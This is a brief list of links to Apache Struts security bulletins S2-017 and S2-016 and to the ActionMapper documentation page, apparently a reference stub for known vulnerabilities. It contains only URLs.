https://struts.apache.org/release/2.3.x/docs/s2-017.html
Reference:
https://struts.apache.org/release/2.3.x/docs/s2-016.html
https://cwiki.apache.org/confluence/display/WW/ActionMapper